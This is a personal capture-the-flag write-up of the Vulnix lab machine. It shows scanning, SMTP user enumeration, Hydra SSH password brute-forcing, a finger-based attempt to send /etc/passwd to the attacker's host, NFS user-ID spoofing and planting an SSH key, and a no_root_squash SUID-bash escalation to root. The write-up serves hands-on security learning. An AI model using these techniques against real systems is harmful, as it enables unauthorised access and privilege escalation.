Vulnix 1

The description for this one says the issues are with software configuration rather than specifically vulnerable versions of software! So, I'll try to do this one without abusing the old versions of software bundled in, it was released 8 years ago after all... I think I need to move onto newer stuff soon.

Nmap scan report for 192.168.173.130
Host is up (0.0016s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
79/tcp   open  finger
110/tcp  open  pop3
111/tcp  open  rpcbind
143/tcp  open  imap
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
993/tcp  open  imaps
995/tcp  open  pop3s
2049/tcp open  nfs
MAC Address: 00:0C:29:61:FF:DC (VMware)

Wow that's a lot of services! We have a big hint for this one - we're expecting misconfigured services. Let's start with SSH:

$ ssh -v root@192.168.173.130
...
debug1: Authentications that can continue: publickey,password

Allowing SSH at root is certainly a misconfiguration! But really all we can do with it, for now, is to try to brute-force root access.

└─$ hydra -l root -P /usr/share/wordlists/metasploit/password.lst ssh://192.168.173.130                                                                                                                255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-10 10:08:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 88397 login tries (l:1/p:88397), ~5525 tries per task
[DATA] attacking ssh://192.168.173.130:22/

I highly doubt this will get us in, but I'll let it run regardless! I also started a SMTP user enumeration module on metasploit, which got me some results:

msf6 auxiliary(scanner/smtp/smtp_enum) > run
[*] 192.168.173.130:25    - 192.168.173.130:25 Banner: 220 vulnix ESMTP Postfix (Ubuntu)
[+] 192.168.173.130:25    - 192.168.173.130:25 Users found: , backup, bin, daemon, games, gnats, irc, landscape, libuuid, list, lp, mail, man, messagebus, news, nobody, postfix, postmaster, proxy, sshd, sync, sys, syslog, user, uucp, whoopsie, www-data
[*] 192.168.173.130:25    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So, I started a short bruteforce on user user and whoopsie too because that just seemed too default:

└─$ hydra -l user -p /usr/share/wordlists/metasploit/http_default_pass.txt ssh://192.168.173.130                                                                                                   255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-10 10:25:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.173.130:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-10 10:25:35
└─$ hydra -l whoopsie -p /usr/share/wordlists/metasploit/http_default_pass.txt ssh://192.168.173.130                                                                                                   255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-10 10:25:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.173.130:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-10 10:25:35

Now I want to turn my attention to all those non-standard services, let's poke at them with a TCP connection:

─$ nc 192.168.173.130 512                                                                                                                        
Where are you?
                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop]
└─$ nc 192.168.173.130 513
                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop]
└─$ nc 192.168.173.130 513 id
invalid port id
                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop]
└─$ nc 192.168.173.130 514                                                                                                                          
getnameinfo: Temporary failure in name resolution
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -v 192.168.173.130 79                                                                                                                                                                           255 ⨯
192.168.173.130: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.173.130] 79 (finger) open
No one logged on.
                                                                                                                                                                                                                                                                                          
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -v 192.168.173.130 79
192.168.173.130: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.173.130] 79 (finger) open
user
Login: user                             Name: user
Directory: /home/user                   Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Login: dovenull                         Name: Dovecot login user
Directory: /nonexistent                 Shell: /bin/false
Never logged in.
No mail.
No Plan.
                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -v 192.168.173.130 79
192.168.173.130: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.173.130] 79 (finger) open
root
Login: root                             Name: root
Directory: /root                        Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Interesting! This is letting us run finger binary... This is basically like getting an SUID binary? Taking a look at gtfobins, finger is there!

# Start a local listener to wait for the file
$ sudo nc -l -p 79 | base64 -d > "local_file"
# Use finger over nc to download a file
└─$ nc -v 192.168.173.130 79
192.168.173.130: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.173.130] 79 (finger) open
"$(base64 /etc/passwd)@192.168.173.129"
fingerd: forwarding not allowed
# Try an upload
└─$ nc -v 192.168.173.130 79
192.168.173.130: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.173.130] 79 (finger) open
kali@192.168.173.129 | base64 -d > "test"
fingerd: forwarding not allowed

Looks like this method is blocked? I'm going to move on for a while... Turning my attention to nfs & rpcbind:

msf6 > use auxiliary/scanner/nfs/nfsmount
msf6 auxiliary(scanner/nfs/nfsmount) > info
       Name: NFS Mount Scanner
     Module: auxiliary/scanner/nfs/nfsmount
    License: Metasploit Framework License (BSD)
       Rank: Normal
Provided by:
  tebo <tebo@attackresearch.com>
Check supported:
  No
Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PROTOCOL  udp              yes       The protocol to use (Accepted: udp, tcp)
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     111              yes       The target port (TCP)
  THREADS   1                yes       The number of concurrent threads (max one per host)
Description:
  This module scans NFS mounts and their permissions.
References:
  https://cvedetails.com/cve/CVE-1999-0170/
  http://www.ietf.org/rfc/rfc1094.txt
msf6 auxiliary(scanner/nfs/nfsmount) > set RHOSTS 192.168.173.130
RHOSTS => 192.168.173.130
msf6 auxiliary(scanner/nfs/nfsmount) > set RPORT 2049
RPORT => 2049
msf6 auxiliary(scanner/nfs/nfsmount) > run
[*] 192.168.173.130:2049  - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/nfs/nfsmount) > set RPORT 111
RPORT => 111
msf6 auxiliary(scanner/nfs/nfsmount) > run
[+] 192.168.173.130:111   - 192.168.173.130 NFS Export: /home/vulnix [*]
[*] 192.168.173.130:111   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

While learning how to mount this, I stumbled accross a potential root vector:

$ sudo mount 192.168.173.130:/home/vulnix /home/kali/Desktop/tmp/test
$ ls -al ./test
ls: cannot open directory 'test': Permission denied
$ ls -al 
total 12
drwxr-xr-x 3 kali   kali       4096 Jan 10 16:14 .
drwxr-xr-x 3 kali   kali       4096 Jan 10 16:13 ..
drwxr-x--- 2 nobody 4294967294 4096 Sep  2  2012 test

I don't think I can get any further here, but this will be a valuable privledge escalation vector later on. Back to try to get a shell on the system... I did some more research, the services on port 513 and 514 are Rlogin and Rexec. Here's me testing login without a password via RExec:

$ └─# rsh -l root 192.168.173.130
The authenticity of host '192.168.173.130 (192.168.173.130)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.173.130' (ECDSA) to the list of known hosts.
root@192.168.173.130's password: 
Permission denied, please try again.
root@192.168.173.130's password: 
Permission denied, please try again.
root@192.168.173.130's password: 
root@192.168.173.130: Permission denied (publickey,password).
                                                                                                                                                                                                             
┌──(root💀kali)-[/mnt]
└─# rsh -l vulnix 192.168.173.130                                                                                                                                                                      255 ⨯
vulnix@192.168.173.130's password: 
Permission denied, please try again.
vulnix@192.168.173.130's password: 
Permission denied, please try again.
vulnix@192.168.173.130's password: 
vulnix@192.168.173.130: Permission denied (publickey,password).

And RLogin

└─$ rlogin -l root -p 513 192.168.173.130 
kex_exchange_identification: read: Connection reset by peer
Connection reset by 192.168.173.130 port 513

I've been poking around for hours and I really can't find anything overly useful, so I'm going to circle back to the basics for a while... Using Finger, let's confirm my old enumerated userlist:

# Test `user`
└─# nc 192.168.173.130 79                                                                                                                                                                              127 ⨯
user
Login: user                             Name: user
Directory: /home/user                   Shell: /bin/bash
Never logged in.
No mail.
No Plan.
└─# nc 192.168.173.130 79
whoopsie
Login: whoopsie                         Name: 
Directory: /nonexistent                 Shell: /bin/false
Never logged in.
No mail.
No Plan.

Okay so it seems the only account created was user, let's try a broader brute-force...

$ hydra -v -l user -P /usr/share/wordlists/metasploit/common_roots.txt ssh://192.168.173.130 -t 4
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-10 17:56:48
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4725 login tries (l:1/p:4725), ~1182 tries per task
[DATA] attacking ssh://192.168.173.130:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://user@192.168.173.130:22
[INFO] Successful, password authentication is supported by ssh://192.168.173.130:22
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 4681 to do in 01:47h, 4 active

My thought here is it can easily be considered a misconfiguration to allow password auth over ssh, so it's worth focusing on some more? I went to get some food.

[STATUS] 33.67 tries/min, 101 tries in 00:03h, 4624 to do in 02:18h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 4521 to do in 02:36h, 4 active
[STATUS] 29.40 tries/min, 441 tries in 00:15h, 4284 to do in 02:26h, 4 active
[STATUS] 28.52 tries/min, 884 tries in 00:31h, 3841 to do in 02:15h, 4 active
[STATUS] 28.60 tries/min, 1344 tries in 00:47h, 3381 to do in 01:59h, 4 active
[STATUS] 28.20 tries/min, 1784 tries in 01:03h, 2941 to do in 01:45h, 4 active
[STATUS] 28.31 tries/min, 2244 tries in 01:19h, 2481 to do in 01:28h, 4 active
[STATUS] 28.38 tries/min, 2704 tries in 01:35h, 2021 to do in 01:12h, 4 active
[22][ssh] host: 192.168.173.130   login: user   password: letmein
[STATUS] attack finished for 192.168.173.130 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-10 19:41:00

WOHOO!! Now that we have a shell, I want to check my anticipated root vector:

user@vulnix:/$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix    *(rw,root_squash)

Ah nope, looks like this isn't going to help us. Onwards with the usual poking...

user@vulnix:/$ find / -perm -4000 2>/dev/null
/sbin/mount.nfs
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/bin/mtr
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/at
/usr/bin/sudoedit
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/procmail
/bin/ping6
/bin/mount
/bin/umount
/bin/su
/bin/ping
/bin/fusermount
user@vulnix:/$ ps aux | grep root
root         1  0.0  0.3   3516  1908 ?        Ss   09:32   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S    09:32   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    09:32   0:00 [ksoftirqd/0]
root         6  0.0  0.0      0     0 ?        S    09:32   0:00 [migration/0]
root         7  0.0  0.0      0     0 ?        S    09:32   0:00 [watchdog/0]
root         8  0.0  0.0      0     0 ?        S<   09:32   0:00 [cpuset]
root         9  0.0  0.0      0     0 ?        S<   09:32   0:00 [khelper]
root        10  0.0  0.0      0     0 ?        S    09:32   0:00 [kdevtmpfs]
root        11  0.0  0.0      0     0 ?        S<   09:32   0:00 [netns]
root        12  0.0  0.0      0     0 ?        S    09:32   0:00 [sync_supers]
root        13  0.0  0.0      0     0 ?        S    09:32   0:00 [bdi-default]
root        14  0.0  0.0      0     0 ?        S<   09:32   0:00 [kintegrityd]
root        15  0.0  0.0      0     0 ?        S<   09:32   0:00 [kblockd]
root        16  0.0  0.0      0     0 ?        S<   09:32   0:00 [ata_sff]
root        17  0.0  0.0      0     0 ?        S    09:32   0:00 [khubd]
root        18  0.0  0.0      0     0 ?        S<   09:32   0:00 [md]
root        21  0.0  0.0      0     0 ?        S    09:32   0:00 [khungtaskd]
root        22  0.0  0.0      0     0 ?        S    09:32   0:00 [kswapd0]
root        23  0.0  0.0      0     0 ?        SN   09:32   0:00 [ksmd]
root        24  0.0  0.0      0     0 ?        S    09:32   0:00 [fsnotify_mark]
root        25  0.0  0.0      0     0 ?        S    09:32   0:00 [ecryptfs-kthrea]
root        26  0.0  0.0      0     0 ?        S<   09:32   0:00 [crypto]
root        34  0.0  0.0      0     0 ?        S<   09:32   0:00 [kthrotld]
root        37  0.0  0.0      0     0 ?        S    09:32   0:00 [scsi_eh_0]
root        38  0.0  0.0      0     0 ?        S    09:32   0:00 [scsi_eh_1]
root        39  0.0  0.0      0     0 ?        S    09:32   0:00 [kworker/u:3]
root        60  0.0  0.0      0     0 ?        S<   09:32   0:00 [devfreq_wq]
root       183  0.0  0.0      0     0 ?        S<   09:32   0:00 [mpt_poll_0]
root       186  0.0  0.0      0     0 ?        S<   09:32   0:00 [mpt/0]
root       191  0.0  0.0      0     0 ?        S    09:32   0:00 [scsi_eh_2]
root       204  0.0  0.0      0     0 ?        S<   09:32   0:00 [kdmflush]
root       212  0.0  0.0      0     0 ?        S<   09:32   0:00 [kdmflush]
root       226  0.0  0.0      0     0 ?        S    09:32   0:00 [jbd2/dm-0-8]
root       227  0.0  0.0      0     0 ?        S<   09:32   0:00 [ext4-dio-unwrit]
root       420  0.0  0.1   2816   612 ?        S    09:32   0:00 upstart-udev-bridge --daemon
root       422  0.0  0.2   3096  1212 ?        Ss   09:32   0:00 /sbin/udevd --daemon
root       515  0.0  0.0      0     0 ?        S<   09:32   0:00 [kpsmoused]
root       621  0.0  0.1   3092   816 ?        S    09:32   0:00 /sbin/udevd --daemon
root       638  0.0  0.1   3092   816 ?        S    09:32   0:00 /sbin/udevd --daemon
root       706  0.0  0.1   2680   996 ?        Ss   09:32   0:00 rpcbind -w
root       760  0.0  0.0      0     0 ?        S<   09:32   0:00 [rpciod]
root       791  0.0  0.0      0     0 ?        S<   09:32   0:00 [nfsiod]
root       799  0.0  0.1   2892   772 ?        Ss   09:32   0:00 rpc.idmapd
root       812  0.0  0.1   2828   600 ?        S    09:32   0:00 upstart-socket-bridge --daemon
root       851  0.0  0.1   2908   812 ?        Ss   09:32   0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
root       874  0.0  0.4   6664  2412 ?        Ss   09:32   0:06 /usr/sbin/sshd -D
root       957  0.0  0.1   4612   832 tty4     Ss+  09:32   0:00 /sbin/getty -8 38400 tty4
root       961  0.0  0.1   4612   840 tty5     Ss+  09:32   0:00 /sbin/getty -8 38400 tty5
root       969  0.0  0.1   4612   836 tty2     Ss+  09:32   0:00 /sbin/getty -8 38400 tty2
root       971  0.0  0.1   4612   836 tty3     Ss+  09:32   0:00 /sbin/getty -8 38400 tty3
root       978  0.0  0.1   4612   832 tty6     Ss+  09:32   0:00 /sbin/getty -8 38400 tty6
root       994  0.0  0.1   2412   716 ?        S    09:32   0:00 /usr/sbin/inetutils-inetd
root       997  0.0  0.2   2992  1140 ?        Ss   09:32   0:00 /usr/sbin/dovecot -F -c /etc/dovecot/dovecot.conf
root      1002  0.0  0.1   2156   604 ?        Ss   09:32   0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
root      1003  0.0  0.1   2600   764 ?        Ss   09:32   0:00 cron
root      1032  0.0  0.1   2700   928 ?        S    09:32   0:00 dovecot/log
root      1034  0.0  0.6   5088  3068 ?        S    09:32   0:00 dovecot/config
root      1055  0.0  0.0      0     0 ?        S    09:32   0:00 [lockd]
root      1056  0.0  0.0      0     0 ?        S<   09:32   0:00 [nfsd4]
root      1057  0.0  0.0      0     0 ?        S<   09:32   0:00 [nfsd4_callbacks]
root      1058  0.0  0.0      0     0 ?        S    09:32   0:00 [nfsd]
root      1059  0.0  0.0      0     0 ?        S    09:32   0:00 [nfsd]
root      1060  0.0  0.0      0     0 ?        S    09:32   0:00 [nfsd]
root      1061  0.0  0.0      0     0 ?        S    09:32   0:00 [nfsd]
root      1062  0.0  0.0      0     0 ?        S    09:32   0:00 [nfsd]
root      1063  0.0  0.0      0     0 ?        S    09:32   0:00 [nfsd]
root      1064  0.0  0.0      0     0 ?        S    09:32   0:00 [nfsd]
root      1065  0.0  0.0      0     0 ?        S    09:32   0:00 [nfsd]
root      1069  0.0  0.3   3568  1760 ?        Ss   09:32   0:00 /usr/sbin/rpc.mountd --manage-gids
root      1173  0.0  0.2   4560  1468 ?        Ss   09:32   0:00 /usr/lib/postfix/master
root      1215  0.0  0.1   4612   848 tty1     Ss+  09:32   0:00 /sbin/getty -8 38400 tty1
root      1218  0.0  0.0      0     0 ?        S    09:32   0:00 [flush-252:0]
root      8781  0.0  0.0      0     0 ?        S    13:22   0:00 [kworker/u:1]
root     10353  0.0  0.0      0     0 ?        S    15:51   0:01 [kworker/0:2]
root     10468  0.0  0.6   9632  3052 ?        Ss   16:00   0:00 sshd: user [priv]   
root     11172  0.0  0.0      0     0 ?        S    16:33   0:00 [kworker/0:1]
root     11368  0.0  0.0      0     0 ?        S    17:03   0:00 [kworker/0:0]
user     11370  0.0  0.1   4372   828 pts/0    S+   17:05   0:00 grep --color=auto root
user@vulnix:/$ cat /etc/ssh/sshd_config 
# Package generated configuration file
# See the sshd_config(5) manpage for details
# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes
# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 768
# Logging
SyslogFacility AUTH
LogLevel INFO
# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes
RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile     %h/.ssh/authorized_keys
# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes
# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes
# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no
#MaxStartups 10:30:60
#Banner /etc/issue.net
# Allow client to pass locale environment variables
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
user@vulnix:/etc$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

Dovecot if misconfigured can apparently result in RCE, and it's running as root... so let's try?

user@vulnix:~$ ps aux | grep dovecot
root       997  0.0  0.2   2992  1140 ?        Ss   09:32   0:00 /usr/sbin/dovecot -F -c /etc/dovecot/dovecot.conf
dovecot   1031  0.0  0.1   2704   832 ?        S    09:32   0:00 dovecot/anvil
root      1032  0.0  0.1   2700   928 ?        S    09:32   0:00 dovecot/log
root      1034  0.0  0.6   5088  3068 ?        S    09:32   0:00 dovecot/config
user     13079  0.0  0.1   4368   832 pts/0    S+   20:47   0:00 grep --color=auto dovecot
user@vulnix:~$ cat /etc/dovecot/dovecot.conf 
## Dovecot configuration file
# If you're in a hurry, see http://wiki2.dovecot.org/QuickConfiguration
# "doveconf -n" command gives a clean output of the changed settings. Use it
# instead of copy&pasting files when posting to the Dovecot mailing list.
# '#' character and everything after it is treated as comments. Extra spaces
# and tabs are ignored. If you want to use either of these explicitly, put the
# value inside quotes, eg.: key = "# char and trailing whitespace  "
# Default values are shown for each setting, it's not required to uncomment
# those. These are exceptions to this though: No sections (e.g. namespace {})
# or plugin settings are added by default, they're listed only as examples.
# Paths are also just examples with the real defaults being based on configure
# options. The paths listed here are for configure --prefix=/usr
# --sysconfdir=/etc --localstatedir=/var
# Enable installed protocols
!include_try /usr/share/dovecot/protocols.d/*.protocol
# A comma separated list of IPs or hosts where to listen in for connections. 
# "*" listens in all IPv4 interfaces, "::" listens in all IPv6 interfaces.
# If you want to specify non-default ports or anything more complex,
# edit conf.d/master.conf.
#listen = *, ::
# Base directory where to store runtime data.
#base_dir = /var/run/dovecot/
# Name of this instance. Used to prefix all Dovecot processes in ps output.
#instance_name = dovecot
# Greeting message for clients.
#login_greeting = Dovecot ready.
# Space separated list of trusted network ranges. Connections from these
# IPs are allowed to override their IP addresses and ports (for logging and
# for authentication checks). disable_plaintext_auth is also ignored for
# these networks. Typically you'd specify your IMAP proxy servers here.
#login_trusted_networks =
# Sepace separated list of login access check sockets (e.g. tcpwrap)
#login_access_sockets = 
# Show more verbose process titles (in ps). Currently shows user name and
# IP address. Useful for seeing who are actually using the IMAP processes
# (eg. shared mailboxes or if same uid is used for multiple accounts).
#verbose_proctitle = no
# Should all processes be killed when Dovecot master process shuts down.
# Setting this to "no" means that Dovecot can be upgraded without
# forcing existing client connections to close (although that could also be
# a problem if the upgrade is e.g. because of a security fix).
#shutdown_clients = yes
# If non-zero, run mail commands via this many connections to doveadm server,
# instead of running them directly in the same process.
#doveadm_worker_count = 0
# UNIX socket or host:port used for connecting to doveadm server
#doveadm_socket_path = doveadm-server
# Space separated list of environment variables that are preserved on Dovecot
# startup and passed down to all of its child processes. You can also give
# key=value pairs to always set specific settings.
#import_environment = TZ
##
## Dictionary server settings
##
# Dictionary can be used to store key=value lists. This is used by several
# plugins. The dictionary can be accessed either directly or though a
# dictionary server. The following dict block maps dictionary names to URIs
# when the server is used. These can then be referenced using URIs in format
# "proxy::<name>".
dict {
  #quota = mysql:/etc/dovecot/dovecot-dict-sql.conf.ext
  #expire = sqlite:/etc/dovecot/dovecot-dict-sql.conf.ext
}
# Most of the actual configuration gets included below. The filenames are
# first sorted by their ASCII value and parsed in that order. The 00-prefixes
# in filenames are intended to make it easier to understand the ordering.
!include conf.d/*.conf
# A config file can also tried to be included without giving an error if
# it's not found:
!include_try local.conf
user@vulnix:~$ ls /etc/dovecot/conf.d 
10-auth.conf      10-logging.conf  10-master.conf  15-lda.conf   20-pop3.conf  90-plugin.conf  auth-deny.conf.ext    auth-passwdfile.conf.ext  auth-system.conf.ext
10-director.conf  10-mail.conf     10-ssl.conf     20-imap.conf  90-acl.conf   90-quota.conf   auth-master.conf.ext  auth-static.conf.ext      auth-vpopmail.conf.ext
user@vulnix:~$ grep use_shell -- $(exim -bP configure_file) 
The program 'exim' can be found in the following packages:
 * exim4-daemon-heavy
 * exim4-daemon-light
Ask your administrator to install one of them

Another deadend, no exim. I'm truly stumped here. I think what I'll do, is stop trying to get root and try to get onto the other user, vulnix and see what we can do from there.... Moving back onto the NFS mount, we know vulnix's user ID now so we should be able to abuse that to mount it and get access to the vulnix user. Let's do that.

# On Remote
$ cat /etc/passwd
...
vulnix:x:2008:2008::/home/vulnix:/bin/bash
...
# Edit /etc/passwd on local machine to change vulnix user ID to be 2008
$ vim /etc/passed
...
# Try to access the mounted NFS drive again
┌──(root💀kali)-[/mnt]
└─# ls                                
vulnix
                                                                                                                                                                                                             
┌──(root💀kali)-[/mnt]
└─# cd vulnix                 
cd: permission denied: vulnix
                                                                                                                                                                                                             
┌──(root💀kali)-[/mnt]
└─# ls                                                                                                                                                                                                   1 ⨯
vulnix
                                                                                                                                                                                                             
┌──(root💀kali)-[/mnt]
└─# ls -al                            
total 48
drwxr-xr-x  3 root   root    4096 Jan 10 19:41 .
drwxr-xr-x 19 root   root   36864 Nov 17 09:13 ..
drwxr-x---  2 vulnix vulnix  4096 Sep  2  2012 vulnix
                                                                                                                                                                                                             
┌──(root💀kali)-[/mnt]
└─# su vulnix                                                           
┌──(vulnix㉿kali)-[/mnt]
└─$ cd vulnix/                                                                                                                                                                                               
┌──(vulnix㉿kali)-[/mnt/vulnix]
└─$ ls                                                                                                                                                                                                       
┌──(vulnix㉿kali)-[/mnt/vulnix]
└─$ ls -al                                                                                                                                                                                                   
total 20
drwxr-x--- 2 vulnix vulnix 4096 Sep  2  2012 .
drwxr-xr-x 3 root   root   4096 Jan 10 19:41 ..
-rw-r--r-- 1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr  3  2012 .bashrc
-rw-r--r-- 1 vulnix vulnix  675 Apr  3  2012 .profile
...

Wohoo! Okay, now let's get ssh access to this user.

$ mkdir .ssh & cd .ssh
$ echo ~/.ssh/id_rsa.pub > authorized_keys
$ ssh vulnix@192.168.173.130
vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)

Sweet, now what can we do...

vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports

Oh shit that was fast, we can edit exports to give ourselves no-root-squash and we win! I used sudoedit to change root_squash -> no_root_squash, but how do I get the machine to update the config... I could cheat and reboot the machine but that's unrealistic. Here it says we just need to run exportfs but we don't have permissions to do so. I tried to find a vector to reboot (without just getting root with old software or a kernel exploit) for a longggg time. I couldn't come up with anything. So - my reasoning for this cheat here is that eventually every real server will reboot. So in the real world we would just wait for that moment. I rebooted the damn thing...

# On host
┌──(root💀kali)-[/mnt]
└─$ sudo mount -t nfs 192.168.173.130:/home/vulnix /mnt/vulnix -o nolock                                                                         
┌──(root💀kali)-[/mnt]
└─$ cd vulnix
# On target
$ cp /bin/bash ~/.x
# On host
$ cp /mnt/vulnix/x /mnt/vulnix/y
$ chmod 4777 /mnt/vulnix/y
# On target
vulnix@vulnix:~$ ./y -p
y-4.2# id
uid=2008(vulnix) gid=2008(vulnix) euid=0(root) groups=0(root),2008(vulnix)
y-4.2# cd /root
y-4.2# ls
trophy.txt
y-4.2# cat trophy.txt 
cc614640424f5bd60ce5d5264899c3be

Finally, we Win! This one took a long time, but I learned a lot and enjoyed the restriction of not being able to just use an exploit chain with metasploit or something.